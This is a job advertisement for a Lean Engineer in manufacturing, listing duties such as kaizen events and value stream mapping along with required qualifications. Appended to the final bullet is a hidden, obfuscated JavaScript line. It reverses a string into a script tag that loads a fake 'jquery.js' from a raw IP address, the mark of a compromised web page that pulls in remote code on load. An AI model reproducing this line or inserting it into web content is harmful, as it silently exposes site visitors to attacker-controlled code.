Industry : Manufacturing
The Lean Engineer is responsible for the implementation of Lean manufacturing principles, tools and best practices within the organization operation which covers external manufacturing partners and new business units.
The successful candidate will lead and support significant projects as well as providing lean training and guidance.
This includes Lean tools training, leading value stream mapping activities, facilitate Kaizen (improvements) event and participate in cross functional teams to support effective use of manpower and materials to achieve lowest overall cost.
– Works with the Plant’s Leadership team to perform gap assessments on the Plant’s manufacturing system, create current and future state value stream maps, and develop Lean improvement plans and schedules.
– Lead cross-functional teams through kaizen events and the implementation of the lean toolset (e.g. cellular flow, line balancing, standard work, 5’s, material and information flow, total productive maintenance, quick change-over)
– Provides training, mentoring and facilitation on the lean toolset.
– Acts as plant expert in lean manufacturing
– Provides ongoing communication to plant and group management on Lean initiatives
– Provides progress reports on the plant’s lean initiatives
– Interacts with plant’s SLT to identify cost saving opportunities and lean projects that improve the value stream.
– Trains and mentors teams to drive improvement initiatives across the organization
– Identifies best practices and copies across all production process to achieve quick deployment of idea and standardization
– Performs Gap analysis and drive manufacturing sites to achieve targeted Lean maturity score by working closely with senior management team.
– Drives LEAN across the various functions to meet targets/KPIs
– Candidate must possess at least a Bachelor’s Degree, Post Graduate Diploma, Professional Degree in MSc in Lean Manufacturing or Change Management
– 5 years’ experience in Lean Manufacturing and Six Sigma certification an advantage
– Knowledge and understanding of manufacturing techniques and limitations is desirable
– Full-Time position(s) available
Skills & knowledge:
– A thorough understanding of Lean Manufacturing Principles, Systems and Tools.
– Strong written and oral communications skills, demonstrated ability to lead team activities excellent problem solving skills, strong computer and presentation skills
– Knowledge of manufacturing operations, systems and project management, including procurement, inventory control, quality, production planning control test and inspection, layout.
– Knowledge of engineering theories, methods and work measurement techniques
– Excellent analytical skills to be able to assess problems thoroughly and drive logical conclusions
– Ability to think strategically with confidence and speed in execution
– Neutral ability to shape project direction without imposing their own views or prejudices on the outcome document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))